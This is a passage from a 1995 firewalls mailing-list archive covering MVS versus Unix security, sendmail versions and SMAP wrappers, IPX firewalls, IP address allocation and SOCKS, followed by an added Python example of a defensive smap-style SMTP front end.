==> are actually used for TCP/IP related services?

Mine is. We receive data continuously, all day long, via TCP/IP from a third party vendor (can't be more specific). I can FTP from my MVS to/from our UNIX. I have no idea of how *many* MVS machines there are on the internet, but a rough guess would be "a lot." And I know that you know, MVS is the core backbone for Client Server. Who d'ya think the Server is?

==> (Where's my Mosaic for MVS? :-)

It works like this: You download lots of MVS data to your unix/os2/windoze/dos whereupon it immediately populates Web pages, Mosaics, (whatever) and you use your unix/os2/windoze/dos presentation services (which really beat MVS's) to display the data. Bang! Zoom! Real client/server.

ITEM 3:

==> IMHO, Suns ...
==> -- were designed with being useful in mind.

Now I know you didn't *mean* this the way it sounds. :-) As a 14 year veteran of MVS all I can say is, UNIX is the latest and greatest and always will be. There simply is *** NO WAY *** a Sun box can match the throughput, data capacity, and multi-user capabilities of MVS. Right now there are some 536 users on my production system alone. We have three test and one development partitions that I didn't even check. And the users are doing *real* company work. If my MVS crashed (don't worry it won't, never does) the company may as well close for the day. Would your company shut down for the day if you lost your Sun box?

I lurk on firewalls to learn; MVS and Unix have their futures tied together. On the internet, computers are supposed to be "open" to everybody, for free. Well MVS was never designed to be that way. So the bigdogs want to open up their systems "like the internet." So they buy Suns to put all the data "on the internet." But now they want security. Well they had security. But they want to give away the data. But with security. Well, what do they want? We (MVS) don't need firewalls. We have trusted security that has been around for 20+ years. (Eons in computer time.) We use a userid and password method to logon, with security based on the userid to object relationship. My wonderment is, why are Suns (Unix, etc) so desperately trying to do all the right things that MVS does, but in a catch-up kind of way.

Do you take backups daily, weekly, monthly, yearly? ALL THE TIME? DAILY? NEVER MISS A DAY?

Larry :-)

From firewalls-owner Tue Sep 12 12:17:06 1995
Date: Tue, 12 Sep 1995 11:34:44 -0900 (PDT)
From: Davin Petersen
To: Christian Kuhtz
cc: Ken Dayton, Firewalls@GreatCircle.COM
Subject: Re: Secure version of Sendmail
In-Reply-To: <199509121736.MAA14128@psisa.com>

On Tue, 12 Sep 1995, Christian Kuhtz wrote:

> The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is
> quasi public domain (check the license out for details).

Right! However stay away from anything less than 8.6.12. The other versions have security holes.

Davin Petersen
Oregon Institute of Technology
Unix Admin/Student

From firewalls-owner Tue Sep 12 12:36:35 1995
From: billcurr@cyberspace.com
Date: Tue, 12 Sep 95 12:25:03 PDT
Message-Id: <9509121925.AA24905@case.cyberspace.com>
Subject: Re: firewall with only one IP address ???
To: firewalls@GreatCircle.COM

The bummer with that is, (as UUNET just informed me this morning) is if I ever switch providers or dump UUNET, they want their 256 IP addresses BACK.

>Agreed with Don:
>
>What's the deal? A class C will give you 256 IP addresses and most
>corporations can qualify for this. Maybe you should go to some of the
>larger ISPs if you're having a problem.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"Printmaker gone digital"
billcurr@cyberspace.com
http://www.cyberspace.com/billcurr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Tue Sep 12 13:13:10 1995
Date: Tue, 12 Sep 1995 15:28:00 +0500
From: bvvanor@rssi.rssi.com (Brad VanOrden)
Message-Id: <9509121928.AA01068@rapid.rssi.com>
To: BEHUBBA@bass.rssi.com, firewalls@greatcircle.com
Subject: Re: IPX firewall?

It should be noted that this firewall will be between two internal Novell segments. If anyone knows of something that can help us, it will be greatly appreciated.

Brad Van Orden
Rapid Systems Solutions

From firewalls-owner Tue Sep 12 13:15:11 1995
Message-Id: <199509121918.PAA15922@rock.cis.ufl.edu>
From: seeger@cis.ufl.edu (F. L. Charles Seeger III)
Date: Tue, 12 Sep 1995 15:18:10 -0400
In-Reply-To: gregg@smtpgate.Disclosure.COM <9508128109.AA810939662@smtpgate.disclosure.com>
To: Firewalls@GreatCircle.COM
Subject: Re: Interpreting CERT advisories

Sorry, but I skimmed over this in the original message.

| ==> (Where's my Mosaic for MVS? :-)

Well, it's neither Mosaic nor MVS, but there is a www MF client:

www://www.nerdc.ufl.edu/pub/vm/www/index.html
ftp://ftp.nerdc.ufl.edu/pub/vm/www/albert.vmarc132

This is the README for "Albert" version 1.3.x (formerly named UF-WWW). Albert is a fullscreen web browser from the University of Florida for IBM 3270 terminals (or emulations). Albert runs on IBM's VM/CMS mainframe operating system. Albert is essentially an Xedit macro that uses the CERN linemode WWW client to get the source for files and then does its own formatting (including HTML parsing).
...
A public-access demonstration is available on the Internet by making a tn3270 connection to nermvs.nerdc.ufl.edu. You'll be presented a menu, in which you should select (or type in the word) UFINFO.
...

I don't know whether or not it is firewalls/socks/proxy friendly.

8-)

Regards,
Chuck

From firewalls-owner Tue Sep 12 13:28:20 1995
Date: Tue, 12 Sep 1995 19:31:56 GMT
From: bret@real.com (Bret McDanel)
Message-Id: <199509121931.TAA06249@real.com>
To: firewalls@greatcircle.com
Subject: Re: Secure version of Sendmail

> On Tue, 12 Sep 1995, Christian Kuhtz wrote:
>
> > The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is
> > quasi public domain (check the license out for details).
>
> Right! However stay away from anything less than 8.6.12. The other
> versions have security holes.

and 8.6.12 doesn't use syslog? There is no secure version.. there are only more secure versions.. This is not totally the fault of any sendmail, as the case with syslog..
From firewalls-owner Tue Sep 12 13:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16345 for firewalls-outgoing; Tue, 12 Sep 1995 12:57:45 -0700 Received: from eagle.twinds.com (eagle.twinds.com [206.27.30.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16332 for ; Tue, 12 Sep 1995 12:57:40 -0700 Received: from hawk.twinds.com by eagle.twinds.com with SMTP (1.37.109.16/16.2) id AA117345758; Tue, 12 Sep 1995 15:55:58 -0400 Date: Tue, 12 Sep 1995 15:56:29 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: Davin Petersen Cc: Christian Kuhtz , Ken Dayton , Firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Excuse me for being dense but......... Since when did sendmail become secure? In case your wondering, I am *not* trying to start a Dr. Fred flame war. I'm just curious, what do you mean by secure? Or am I missing something? Has something new happened to sendmail that I don't know about? -arc Arley Carter Tradewinds Technologies, Inc ac@hawk.twinds.com www: http://www.twinds.com On Tue, 12 Sep 1995, Davin Petersen wrote: > On Tue, 12 Sep 1995, Christian Kuhtz wrote: > > > The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is > > quasi public domain (check the license out for details). > > Right! However stay away from anything less than 8.6.12. The other > versions have security holes. 
> > Davin Petersen > Oregon Institute of Technology > Unix Admin/Student > From firewalls-owner Tue Sep 12 13:42:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17338 for firewalls-outgoing; Tue, 12 Sep 1995 13:13:19 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA17331 for ; Tue, 12 Sep 1995 13:13:14 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id PAA18274; Tue, 12 Sep 1995 15:10:26 -0500 Message-Id: <199509122010.PAA18274@psisa.com> Subject: Re: Secure version of Sendmail To: ac@hawk.twinds.com (Arley Carter) Date: Tue, 12 Sep 1995 15:10:26 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Arley Carter" at Sep 12, 95 03:56:29 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1428 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Excuse me for being dense but......... Since when did sendmail become > secure? In case your wondering, I am *not* trying to start a Dr. Fred > flame war. I'm just curious, what do you mean by secure? > Or am I missing something? Has something new happened to sendmail that > I don't know about? Ask secure as an as complex program as Sendmail V8 can probably be (considering the history). At any rate, if you don't trust Sendmail V8, wrap it using SMAP from the TIS toolkit. Which is probably your best bet in that case anyways due to the nature of Sendmail. Your only chance is to try to stay as up to date as possible with regards to new releases of Sendmail V8 -- common sense IMHO. Eric Allman has done a fabulous job as far as security is concerned. MHO. Note: I'm talking specifically about Sendmail V8. Everything else is definitely a lot more than just a firehazard. 
Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Tue Sep 12 14:14:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA18742 for firewalls-outgoing; Tue, 12 Sep 1995 13:48:33 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA18733 for ; Tue, 12 Sep 1995 13:48:29 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id NAA17642; Tue, 12 Sep 1995 13:46:50 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma017639; Tue Sep 12 13:46:29 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id NAA19619; Tue, 12 Sep 1995 13:43:57 -0700 Date: Tue, 12 Sep 1995 13:43:57 -0700 From: Brian Murrell Message-Id: <199509122043.NAA19619@mocha.bctel.net> To: firewalls@GreatCircle.COM, billcurr@cyberspace.com Subject: Re: firewall with only one IP address ??? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The bummer with that is, (as UUNET just informed me this morning) is if I ever > switch providers or dump UUNET, they want their 256 IP adresses BACK. go get your own 256 host class c and then have uunet route that. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. 
brian@wimsey.com 604 454 5262 From firewalls-owner Tue Sep 12 14:16:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA18087 for firewalls-outgoing; Tue, 12 Sep 1995 13:37:03 -0700 Received: from eagle.twinds.com (eagle.twinds.com [206.27.30.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA18078 for ; Tue, 12 Sep 1995 13:36:56 -0700 Received: from hawk.twinds.com by eagle.twinds.com with SMTP (1.37.109.16/16.2) id AA117448126; Tue, 12 Sep 1995 16:35:26 -0400 Date: Tue, 12 Sep 1995 16:35:56 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: Christian Kuhtz Cc: firewalls@greatcircle.com Subject: Re: Secure version of Sendmail In-Reply-To: <199509122010.PAA18274@psisa.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995, Christian Kuhtz wrote: > Ask secure as an as complex program as Sendmail V8 can probably be (considering > the history). At any rate, if you don't trust Sendmail V8, wrap it using SMAP My point exactly. Sendmail fails the First Law of Computer Security miserably. This law espoused by Cheswick and Bellovin, Bell Labs is The security, reliability and bugginess of a program is inversely related to the program's size and complexity. In that light, I query sendmail secure? How?....... In what context do you mean secure? Surely this is an oxymoron. That being said I am delivering this mail with sendmail, latest version of sendmail "certified" by hp for hpux. ;-) Regards: -arc Arley Carter Tradewinds Technologies, Inc. 
ac@hawk.twinds.com www: http://www.twinds.com From firewalls-owner Tue Sep 12 14:32:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA19626 for firewalls-outgoing; Tue, 12 Sep 1995 14:03:50 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA19617 for ; Tue, 12 Sep 1995 14:03:45 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id OAA04235; Tue, 12 Sep 1995 14:02:23 -0700 Date: Tue, 12 Sep 1995 14:02:23 -0700 Message-Id: <199509122102.OAA04235@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma004233; Tue Sep 12 14:01:42 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Bradley E. Hubbard" , "'smtp:firewalls@greatcircle.com'" From: Andrew Foss Subject: Re: IPX firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote: > >Hello, > >I'm wondering if anyone knows of any firewall products that have been >developed in and for an IPX environment? Internet Junction (recently purchased by Cisco) has a gateway that converts IPX to IP. It's available for Solaris, HP-UX, IRX ... It has the advantage of not putting TCP stacks on the IPX clients, but it's not the right solution for many people. 1. TCP stacks are now free and Win95 and all that jive from Redmond will have it included. 2. The IJ product still requires a dll on all the PC's. 3. Compatibility in gatewaying the 2 unlike protocols seems to be a continual challenge. 4. It has to run as an application on a machine which will need to be adequately secured itself. 5. Performance is limited. I don't want to offend anyone, but I think the right solution is just let the IPX clients live in the IP world as opposed to trying to gateway their protocols. 
> >Thanks in advance, > >Brad Hubbard >behubba@rssi.com > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 15:05:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21447 for firewalls-outgoing; Tue, 12 Sep 1995 14:49:34 -0700 Received: from telemann.inoc.dl.nec.com (telemann.inoc.dl.nec.com [143.101.112.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA21439 for ; Tue, 12 Sep 1995 14:49:29 -0700 Received: by telemann.inoc.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id QAA26279(telemann.inoc.dl.nec.com); Tue, 12 Sep 1995 16:48:08 -0500 Received: by texas.syl.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id QAA19628(texas.syl.dl.nec.com); Tue, 12 Sep 1995 16:48:07 -0500 To: firewalls@GreatCircle.com Date: 12 Sep 95 21:47:51 GMT From: cornell@syl.dl.nec.com (Cornell Kinderknecht) Message-ID: Organization: CSTC - NEC Systems Lab., Irving (Dallas), TX Path: syl.dl.nec.com!syl.dl.nec.com!cornell Reply-To: cornell@syl.dl.nec.com Subject: New SOCKS WWW page Newsgroups: necus.internet.mirror.firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just a short note to let people know about the new SOCKS home page at: http://www.socks.nec.com/ --- Cornell -- | Cornell Kinderknecht Email: cornell@syl.dl.nec.com | | CSTC | | NEC Systems Lab. 
Phone: 214-518-3509 | | Irving, TX (Dallas) | From firewalls-owner Tue Sep 12 15:13:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20827 for firewalls-outgoing; Tue, 12 Sep 1995 14:32:57 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA20820 for ; Tue, 12 Sep 1995 14:32:51 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA00330; Tue, 12 Sep 95 17:34:32 EDT Date: Tue, 12 Sep 1995 17:34:30 -0400 (EDT) From: Scott Barman To: gregg@smtpgate.Disclosure.COM Cc: Firewalls@Greatcircle.COM Subject: Re: Re: Interpreting CERT advisories In-Reply-To: <9508128109.AA810939662@smtpgate.disclosure.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995 gregg@smtpgate.Disclosure.COM wrote: > Jet - (J.Eric Townsend-jet@abulafia.genmagic.com) writes: > > ==> How many MVS systems are plugged directly into the internet? How many > ==> are actually used for TCP/IP related services? (Where's my Mosaic for > ==> MVS? :-) > ==> IMHO, Suns get broken into all the time because: > ==> -- everybody has one to practice on > ==> -- they were designed with being useful in mind. > > ITEM 1: > > ==> IMHO, Suns get broken into all the time because: > ==> -- everybody has one to practice on > > Excuse me?!? MVS has been *in production* since the late 70's; abundantly > installed around the World. IMHO, plenty of time/opportunity for hackers to > try hacking in. The reason you don't hear about hackers hacking MVS is The question then to add is how long has MVS been running with a TCP/IP stack and supporting connections to the internet. > because, well, you can't. Much too difficult. In the 9 MVS shops I've worked > in all were protected by non-hackable security software called ACF2. Perhaps ACF2 is breakable... 
I can introduce you to someone who does it on a regular basis. I am not saying it's easy, but it is not impenetrable. Yes, it's a well done service for the MVS environment, but it is not perfect. > adding your programs to those lists... well, it goes on and on. Now all of > this isn't to say that someone couldn't write a program to, say, steal raw > data straight from a disk via TCP/IP. But what thrill is that? Nay, hacking > MVS (or trying to) is a waste of time. Can you say "corporate espionage?" The person who I mentioned above used to be involved with that. It's not a waste of time for those looking for corporate secrets! > ITEM 2: > > ==> How many MVS systems are plugged directly into the internet? How many > ==> are actually used for TCP/IP related services? > > Mine is. We receive data continuously, all day long, via TCP/IP from a third > party vendor (can't be more specific). I can FTP from my MVS to/from our UNIX. > I have no idea of how *many* MVS machines there are on the internet, but a > rough guess would be "a lot." And I know that you know, MVS is the core > backbone for Client Server. Who d'ya think the Server is? It is??? Since when?? > ==> (Where's my Mosaic for MVS? :-) > > It works like this: You download lots of MVS data to your unix/os2/windoze/dos > whereupon it immediately populates Web pages, Mosaics, (whatever) and you use > your unix/os2/windoze/dos presentation services (which really beat MVS's) to > display the data. Bang! Zoom! Real client/server. Typical batch processing mentality that keeps me in business suggesting massively parallel systems to replace mainframe repositories. Real client server is more than downloading data and kludging a read request. Mosaic/Netscape and the like get this info in "real time" and display it as it comes in. Not "download it, start the reader process and display it watching this directory for more to come in and populate this directory." Even M$ SQL Server works better than that!! 
> ITEM 3: > > ==> IMHO, Suns ... > ==> -- were designed with being useful in mind. > > Now I know you didn't *mean* this the way it sounds. :-) As a 14 year veteran > of MVS all I can say is, UNIX is the latest and greatest and always will be. > There simply is *** NO WAY *** a Sun box can match the throughput, data > capacity, and multi-user capabilities of MVS. Right now there are some 536 > users on my production system alone. We have three test and one development > partitions that I didn't even check. And the users are doing *real* company > work. If my MVS crashed (don't worry it won't, never does) the company may as > well close for the day. Would your company shut down for the day if you lost > your Sun box? I wouldn't do it with a Sun either. I would be looking into Pyramid or Tandon, or someone else. Heck, I'd replace a mainframe with an SGI Onyx before I would consider a Sun (and I have a lot of gripes with IRIX!). > I lurk on firewalls to learn; MVS and Unix have their futures tied together. MVS is dying. There are fewer and fewer jobs out there for MVS people and many are running scared. As a part-time instructor in a Unix/C certification program, more than 70% of the students I have taught were mainframers who either had to learn Unix because their company was migrating to it or they needed to learn it because the job market is moving in that direction. > On the internet, computers are supposed to be "open" to everybody, for free. Oh yea? Do you see the connection bills? > Well MVS was never designed to be that way. So the bigdogs want to open up That's right... and that's the problem with MVS and the internet--the system wasn't designed for it. And I know for a fact that the system you are talking about is nearly croaking under its current TCP/IP load and cannot support another system making TCP/IP requests without the addition of specialized hardware. How secure is that hardware, especially when it's running a TCP/IP stack?? 
> their systems "like the internet." So they buy Suns to put all the data "on > the internet." But now they want security. Well they had security. But they > want to give away the data. But with security. Well, what do they want? We Give? I'll leave the rest to private email! :-) scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Tue Sep 12 15:30:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA22785 for firewalls-outgoing; Tue, 12 Sep 1995 15:16:58 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA22778 for ; Tue, 12 Sep 1995 15:16:55 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id PAA04556; Tue, 12 Sep 1995 15:15:25 -0700 Date: Tue, 12 Sep 1995 15:15:25 -0700 Message-Id: <199509122215.PAA04556@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma004552; Tue Sep 12 15:14:38 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Brian Murrell , firewalls@GreatCircle.COM, billcurr@cyberspace.com From: Andrew Foss Subject: Re: firewall with only one IP address ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you share registered IP addresses and NEVER permanently assign them to your network and hosts, this is a non-issue. If CIDR or any other reason comes along and changes your IP addresses, you only need to update the shared global pool, and never renumber your whole net! 
At 01:43 PM 9/12/95 -0700, Brian Murrell wrote: > >> The bummer with that is, (as UUNET just informed me this morning) is if I ever >> switch providers or dump UUNET, they want their 256 IP adresses BACK. > >go get your own 256 host class c and then have uunet route that. > >b. > >-- >Brian J. Murrell murrell@bctel.net >BCTel Advanced Communications brian@ilinx.com >Vancouver, B.C. brian@wimsey.com >604 454 5262 > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 16:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA25697 for firewalls-outgoing; Tue, 12 Sep 1995 16:04:19 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA25690 for ; Tue, 12 Sep 1995 16:04:13 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA03933 for ; Tue, 12 Sep 1995 18:02:55 -0500 Received: from po_box.cig.mot.com (po_box.cig.mot.com [136.182.15.5]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA01775 for ; Tue, 12 Sep 1995 18:02:54 -0500 Message-Id: <199509122305.TAA00271@po_box.cig.mot.com> Received: (lehman@localhost) by bongo.cig.mot.com (8.6.11/SCERG-1.12C) id SAA25209; Tue, 12 Sep 1995 18:02:53 -0500 Date: Tue, 12 Sep 1995 18:02:53 -0500 (CDT) From: D Matthew Lehman X-Sender: lehman@bongo To: firewalls@GreatCircle.COM Subject: A little different use for a firewall X-Favorite-Ultimate-Team: Flying Lentils Footer: "D. M. 
Lehman, IL27-3B6, Motorola Inc., Arlington Heights, IL 60004" Priority: Normal Organization: Motorola Cellular Infrastructure Group MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm kind of new to setting up firewalls, so I wanted to gather other opinions on how to solve this problem. Scenario: I have a device with several IP addresses. All the interfaces insist on being 128.0.0.xxx (I know this is wrong, but this is what I'm trying to work around). I need to connect the device to the rest of our network and allow the device to be accessed from the "normal" side of the network. Hosts on the "normal network" need to think that the device is on a legal subnet and the device needs to be able to send packets back. I need all packets to go through, not just IP. Security is not so much a concern as functionality. My thought was to put some sort of firewall in place to do address translation for lack of a better term (see diagram). My question is: Is this possible with a single machine acting as a firewall, or is it even possible with two machines acting as a firewall? +----------+ | Goofy | 128.0.0.1 +-------------+ "Normal Network" | Device |-----------+ | | | | 128.0.0.2 | 128.0.0.10 | Firewall | 191.1.2.1 | |-----------+-------------------| |----------->> | | 128.0.0.3 | | | | |-----------+ +-------------+ +----------+ or..... +----------+ | Goofy | 128.0.0.1 | Device |-----------+ +------------------+ | | 128.0.0.2 | 128.0.0.10 | | | |-----------+---------------| Firewall #1 | | | 128.0.0.3 | | | | |-----------+ +------------------+ +----------+ | 180.1.1.1 | | 180.1.1.2 +------------------+ 192.1.2.1 | | <<------------| Firewall #2 | | | +------------------+ Any advice is appreciated. D. 
Matthew Lehman Email: lehman@cig.mot.com Inter-Networking Team Phone: 708.632.3426 Motorola Cellular Infrastructure Group FAX: 708.632.6658 From firewalls-owner Tue Sep 12 17:02:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA27465 for firewalls-outgoing; Tue, 12 Sep 1995 16:42:55 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA27458 for ; Tue, 12 Sep 1995 16:42:52 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.6.11/8.6.9) id SAA10150 for ; Tue, 12 Sep 1995 18:35:30 -0500 Received: from worldcom-18.worldcom.com(198.64.193.9) by safety.worldcom.com via smap (V1.3) id sma010100; Tue Sep 12 18:34:51 1995 Received: by worldcom-18.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.13/3.3) id AA5181; Tue, 12 Sep 95 18:32:53 -0700 Message-Id: <9509130132.AA5181@worldcom-18.worldcom.com> Received: from worldcom with "Lotus Notes Mail Gateway for SMTP" id 53FA75B7ED64F4AA8625623500809AD1; Tue, 12 Sep 95 18:32:53 To: Firewalls From: Dan Thorson Date: 12 Sep 95 17:50:14 EDT Subject: Re: Secure version of Sendmail Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As many have already said, there's no version of sendmail that could reasonably be considered "secure", however there are some wrappers, "smap" and "smapd" being one pair. Perhaps this is what you're looking for? 
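Kuhtz and Thorson both point at smap from the TIS Firewall Toolkit: a small program that speaks just enough SMTP to take a message off the wire and write it to a spool, while a second program (smapd) feeds the spool to sendmail, so sendmail itself never listens on the network. The session logic below is an added example of that idea written for this page; it is not the toolkit's code and not from the thread. The accepted command subset, the address syntax and the size limits are assumptions. It is written as a pure state machine so it can be exercised without a socket; in a real deployment the listener would also run as an unprivileged user inside a chroot, as smap did.

```python
"""smap-style SMTP front end as a pure state machine (added example)."""
import re

MAX_LINE, MAX_RCPTS, MAX_BYTES = 1000, 100, 1_000_000   # assumed local policy
# Only addresses made of letters, digits and a little punctuation are handed on
# to the real MTA; quotes, '|', spaces and control characters never reach sendmail.
ADDR_RE = re.compile(r"^<?([A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+)>?$")
NULL_SENDER = re.compile(r"^<>$")


def parse_addr(arg, allow_null=False):
    arg = arg.strip()
    if allow_null and NULL_SENDER.match(arg):
        return ""                       # bounces come from the null sender
    m = ADDR_RE.match(arg)
    return m.group(1) if m else None


class SmapSession:
    """One client connection: feed() takes a line, returns the reply (None while in DATA)."""

    def __init__(self):
        self.spool = []                 # accepted messages: (sender, rcpts, body)
        self.helo = None
        self._reset()

    def _reset(self):
        self.sender, self.rcpts, self.body = None, [], []
        self.size, self.in_data, self.too_big = 0, False, False

    def feed(self, line):
        if len(line) > MAX_LINE:
            if self.in_data:            # keep draining, but the message is already refused
                self.too_big, self.body = True, []
                return None
            return "500 Line too long"
        if self.in_data:
            return self._data(line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip() or None
            return "250 smap ready"     # no extensions are advertised
        if verb == "MAIL":
            addr = parse_addr(arg[5:], allow_null=True) if arg.upper().startswith("FROM:") else None
            if addr is None:
                return "501 Syntax error in sender"
            self._reset()
            self.sender = addr
            return "250 Sender ok"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Need MAIL first"
            addr = parse_addr(arg[3:]) if arg.upper().startswith("TO:") else None
            if addr is None:
                return "501 Syntax error in recipient"
            if len(self.rcpts) >= MAX_RCPTS:
                return "452 Too many recipients"
            self.rcpts.append(addr)
            return "250 Recipient ok"
        if verb == "DATA":
            if not self.rcpts:
                return "503 Need RCPT first"
            self.in_data = True
            return "354 Enter mail, end with \".\" on a line by itself"
        if verb == "RSET":
            self._reset()
            return "250 Reset"
        if verb == "NOOP":
            return "250 Ok"
        if verb == "QUIT":
            return "221 Closing connection"
        # VRFY, EXPN, HELP, TURN and the old DEBUG/WIZ commands are simply absent:
        # what the network-facing program does not implement cannot be abused.
        return "502 Command not implemented"

    def _data(self, line):
        if line == ".":
            if self.too_big:
                reply = "552 Message too large"
            else:
                self.spool.append((self.sender, tuple(self.rcpts), "\n".join(self.body)))
                reply = "250 Message accepted for delivery"
            self._reset()
            return reply
        if line.startswith("."):        # undo SMTP dot-stuffing
            line = line[1:]
        self.size += len(line) + 1
        if self.size > MAX_BYTES:
            self.too_big, self.body = True, []
        elif not self.too_big:
            self.body.append(line)
        return None


def run_session(lines):
    """Drive one session over a scripted client; return (replies, spooled messages)."""
    session = SmapSession()
    replies = [r for r in (session.feed(l) for l in lines) if r is not None]
    return replies, session.spool
```

The point of the design is what is missing: no address rewriting, no aliases, no program or file delivery, no VRFY/EXPN, no extensions. Everything that made sendmail's network side dangerous is handled later, by sendmail reading a spool file as an ordinary local submission.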
